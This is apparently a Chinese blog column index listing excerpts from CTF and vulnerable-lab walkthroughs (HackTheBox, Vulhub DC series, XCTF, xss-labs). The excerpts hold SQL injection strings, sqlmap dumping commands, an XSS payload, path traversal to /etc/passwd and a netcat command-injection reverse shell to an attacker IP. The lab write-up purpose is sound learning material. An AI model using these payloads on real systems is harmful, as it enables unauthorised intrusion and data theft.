靶场与CTF系列
文章平均质量分 75
以实战为基准 复现一些靶场的通关方式 从中学习经验 包括一些靶场的源码解析 包括一些CTF题目的理解
Simon_Smith
这个作者很懒,什么都没留下…
展开
-
CTF例题合集(2)
由于判断可以得知 字符长度比较短的是stop hacking ,所以1405的是被过滤掉的内容。此时不难发现,admin右边的引号被转义成了普通的字符,所以admin左边的引号会和password右边的引号闭合。不难发现网页的回显结果非常单一,这可能是盲注注入类型 (布尔盲注)而#后面的内容都被注释掉了,所以此时的注入位置是123456。这里是fuzz字典,里面有很多可能被注释掉的敏感字段内容。接下来可以一步步的手工去进行盲注,不过非常的耗费时间。根据网页回显的特性不难发现,这符合布尔盲注的特点。...原创 2022-08-25 17:58:56 · 1198 阅读 · 0 评论 -
CTF例题合集(1)
判断出来闭合是单引号 接下来构造完整的闭合语句 发现回显正常 说明闭合差不多成功!可以使用and 1=1 和and 1=2进行控制性测试 这里不演示。1.用burp抓包登录进入,任意输入账号(除了admin)和密码即可,注意网页对admin账户最开始做了限制,所以admin是没办法登录进去的。(修改账号提交): nctf.nuptzj.cn/web13/index.php?状态码200表示请求成功 状态码401表示未授权访问 也就是登录失败。说明有3列在这个数据库中 接下来可以开始进行数据库的注入操作。.原创 2022-08-25 17:49:26 · 6294 阅读 · 3 评论 -
Hackthebox靶场---Undetected 攻略实战(难)
正常思路 nmap进行端口扫描 发现开放了80和22端口网站进入80端口 是一个珠宝网站发现点击store会重定向到其他的urlhttp://store.djewelry.htb/我们首先用dirsearch扫描一下然而并没有发现什么有用的,也跟基本主界面测试差不多 除了store可能有可以利用的地方我们不妨把这个未知url的地址也dns解析到这个ip地址 执行以下命令即可echo 10.10.11.146 djewelry.htb store.dj...原创 2022-04-24 16:14:38 · 4234 阅读 · 2 评论 -
HacktheBox靶场之Backdoor 核心提炼
自勉一句话:思维比工具更重要内网靶场Backdoor主要方向1:信息搜集(对目标的端口 服务 网站等进行扫描)nmap普通扫描 端口开放80和22nmap进行全端口扫描 多出来一个1337nmap -sS -sC -p- --min-rate=5000 10.10.11.125nmap漏洞模块的扫描:发现后台登录地址 以及用户admin这里学习到 一般wordpress的后台登录地址都是域名下的wp-login.phpnikto扫描工具没有发现什么...原创 2022-04-21 20:05:12 · 2144 阅读 · 1 评论 -
xss-labs靶场通关payload
地址: 欢迎来到XSS挑战流程:1.正常人 正常去输入即可2.标准测试代码输入 找相应的互动点有哪些 查看网页源代码3.寻找注入点 构造payload提交即可ssaq.com dsds' value=javascript:alert(1)Level1url:https://xssaq.com/yx/level1.php?name=test<h2 align=center>欢迎用户test</h2><center><..原创 2022-04-18 09:39:27 · 691 阅读 · 0 评论 -
ftp系实战和ssl注入实战
nmap进行扫描 发现目标开启的21号端口 ftp的服务看到了ProFTPD 可以考虑一下使用一些其现成的漏洞搜索漏洞库我们也可以在msf中进行搜索直接使用相应的漏洞即可这是利用了一些软件的旧版本所存在的漏洞进行的提权接下来是ssl注入实战第一步正常nmap扫描发现只开放了80端口 所以只能从web端入手了后续发现网站url上是shtml 说明可能存在ssl注入的可能使用nikto对其进行扫描有可能存在ss...原创 2022-03-30 10:23:40 · 574 阅读 · 0 评论 -
smb信息泄露实战
1.正常使用nmap进行目标的扫描我们可以尝试下载里面的文件 使用get命令即可下载此时文件提示密码是12345在查看一下其他的文件目录cd /wordpresslswordpress的目录中一般都是有配置文件的 我们通过get把wordpress的配置文件下载下来接下来可以尝试去网站进行登录 由于不知道登录的后台地址我们可以首先通过工具对目标网站进行扫描这里可以通过dirb进行扫描dirb http://192.168.1.47..原创 2022-03-30 09:52:10 · 235 阅读 · 0 评论 -
XCTF靶场实战(3)
lottery这是一个菠菜网站的源码先正常注册一个账户 之后会送你20美元用于菠菜之后要通过赢的美元去购买相应的flag接下来对网站进行扫描接下来可以通过gitHack工具下载相应的网站源码分析后找到了漏洞的位置 接下来我们需要对抓包得到的数据包进行修改之后放行 钱就增加了很多了。之后可以通过重放模块去刷钱 刷够了买payload即可bug进入以后先正常注册用户之后登录通过抓包分析以后 发...原创 2022-03-29 15:40:34 · 1376 阅读 · 0 评论 -
XCTF靶场实战(2)
mfw接下来对该网站进行扫描python dirsearch.py -uhttp://111.200.241.244:65406/ -e php说明可能存在源码的泄露问题可能有git泄露 我们需要使用工具githackwindows执行不了就去kali中执行python3 GitHack.pyhttp://111.200.241.244:65406/.git/这里也可以使用另一款工具Git_Extractpython git_extrac...原创 2022-03-29 15:37:44 · 766 阅读 · 0 评论 -
XCTF靶场实战(1)
新手练习区1禁用js2robots.txt在网站根目录里面可以规定搜索引擎看或者不看什么内容3xxxx.txt.bakindex.phpsxxxx.rar.zip.7z.tar.gz.bak.txt.swpgithubwww.xxx.com/.git/config苹果电脑.DS_Store文件/目录泄露svn文件泄露subversion,开源代码控制系统www.xxx.com/.svn/entires...原创 2022-03-29 15:33:23 · 1244 阅读 · 0 评论 -
私钥泄露实战
私钥泄露实战:1.首先对目标进行nmap的端口扫描 发现开放了80 22 以及31337端口相应的探针显示 80 和31337都是http的服务 而且31337是python的一个回显2.浏览器访问相应的网站以及对应的端口 80端口是nginx 31337是not found3.使用一款软件叫dirbdirb http://192.168.1.57:31337对该网站进行扫描前两个和linux系统ssh连接有关能够访问 .ssh 说明网站存...原创 2022-03-29 15:26:05 · 1675 阅读 · 0 评论 -
CH4INRULZ_v1.0.1内网渗透靶场
nmap -T4 -A -p- 192.168.206.146这里我们借助工具dirsearch对该网站进行目录扫描http://192.168.206.146/development/然后再通过御剑进行扫描http://192.168.206.146/index.html.bakfrank:$apr1$1oIGDEDK$/aVFPluYt56UvslZMBDoC0通过工具john进行一下解密 把解密结果存储到相应文件中cd ...原创 2022-03-17 08:41:56 · 456 阅读 · 0 评论 -
Vulhub-DC-9靶场实战攻略
首先正常通过arp-scan进行主机发现 然后nmap扫描得到开放端口之后访问界面 各种尝试后猜测search界面存在sql注入接下来通过burp抓包 修改search的参数 为了看清到底有没有报错出现 可以通过搜索正确的内容 例如Mary用于后期判断闭合以及是否注入search=Mary' order by 6 --+search=Mary' order by 7 --+search=Mary' union select 1,2,3,4,5,6 -...原创 2022-03-17 08:38:50 · 449 阅读 · 0 评论 -
Vulhub-DC-8靶场实战攻略
测试网页中的Details 发现可以通过Get传参数 加上单引号以后出现报错 说明存在SQL注入的漏洞 通过sqlmap进行尝试sqlmap -uhttp://192.168.206.142/?nid=1 -D d7db --tablessqlmap -u http://192.168.206.142/?nid=1 -D d7db -T users --columnssqlmap -u http://192.168.206.142...原创 2022-03-17 08:34:54 · 947 阅读 · 0 评论 -
Vulhub-DC-7靶场实战攻略
arp-scan -lnmap -T4 -A 192.168.206.141PS:ssh链接成功 接下来可以直接链接mysql 然后查看用户 改掉密码就可以登录后台了 也可以借鉴下面这个思路 通过drush重置密码进入/var/www/html/ 目录下以后由于是Drupal搭建的网站 计划任务用到了drush 可以尝试如下的命令重置登录密码和用户drush user-password admin --password="abcdefg"...原创 2022-03-17 08:30:26 · 207 阅读 · 0 评论 -
Vulhub-DC-6靶场实战攻略
首先 正常通过arp-scan进行主机发现然后对发现的主机进行nmap扫描 发现存在重定向 所以修改一下hosts文件即可根据对Wordpress网站的熟悉 或者可以使用工具nikto进行扫描 最后得知登录目录是192.168.206.143/wp-login.php也可以通过工具扫描nikto -h 192.168.206.143接下来通过工具去扫描可能存在的用户wpscan --url wordy -e u得到存在的用户名有adm...原创 2022-03-17 08:26:39 · 291 阅读 · 0 评论 -
Vulhub-DC-5靶场实战攻略
基于以上变化 考虑burp抓个包进行分析尝试思路1:通过爆破去发现这个网站有哪些文件可以浏览字典部分添加Filenames-short 和Filenames-longhttp://192.168.206.139/thankyou.php?file=../../../../../../../../../etc/passwdNginx日志位置:/var/log/nginx/error.log...原创 2022-03-17 08:23:20 · 308 阅读 · 0 评论 -
Vulhub-DC-4靶场实战攻略
靶场DC-4和前面DC-1和2相同的网络配置 只有DC-3比较特别 需要重新调配相应的环境arp-scan -lnmap -T4 -A 192.168.206.130 -p 1-65535http://192.168.206.130可以借助工具burpsuite进行暴力破解由于非常智障 这里不多赘述结果 用户名 admin 密码happync+192.168.206.128+9999+-e+/bin/bashnc -lvp 9999...原创 2022-03-16 22:47:13 · 1569 阅读 · 0 评论 -
Vulhub-DC-3靶场实战攻略
靶场情况特殊 NAT模式无法上线 接下来考虑把靶机放到virtualbox上 但是需要设置virtualbox和vmware共用虚拟网卡才能同网段扫描之后在kali中就可以选择网卡 测试的时候选择和virtualbox相同的网卡即可 上网的时候选择nat模式的网卡即可开启virtualbox的靶机然后攻击机切换网卡到和靶机同一个网段后即可开始进行arp扫描主机的存活arp-scan -lnmap -T4 -A 192.168.56.1...原创 2022-03-16 22:43:34 · 438 阅读 · 0 评论 -
Vulhub-DC-2靶场通关攻略
arp-scan -lnmap -sV -p- 192.168.109.140也可以执行如下命令 可以探测目标主机是否存活nmap -T4 -sP 192.168.109.140也可以尝试如下的命令 -A是主动扫描 -p设置的是端口 -oN可以把结果输出到文件 结果保存在root目标下nmap -T4 -A 192.168.109.140 -p 1-65535 -oN haha.txt想要访问可以进入如下...原创 2022-03-16 22:21:40 · 739 阅读 · 0 评论 -
Vulhub-DC-1靶场通关攻略
靶场环境配置:修改为usb1.0同时新建网络,把网络修改为NAT即可首先开启靶机环境和kali黑客机器环境 通过NAT模式可以保证两者处于同一个内网环境中切记 vmware和virtualbox的虚拟网卡可能网段不同 所以要保证kali和靶机在同一个网段 否则无法扫描到相应的靶机1.第一步 通过kali中自带的一个工具 arp-scan进行内网存活主机探测arp-scan -l2.接下来可以借助nmap对目标进行扫描其中 -sV服务指纹识别 可以探测目标系统...原创 2022-03-16 22:06:20 · 3549 阅读 · 0 评论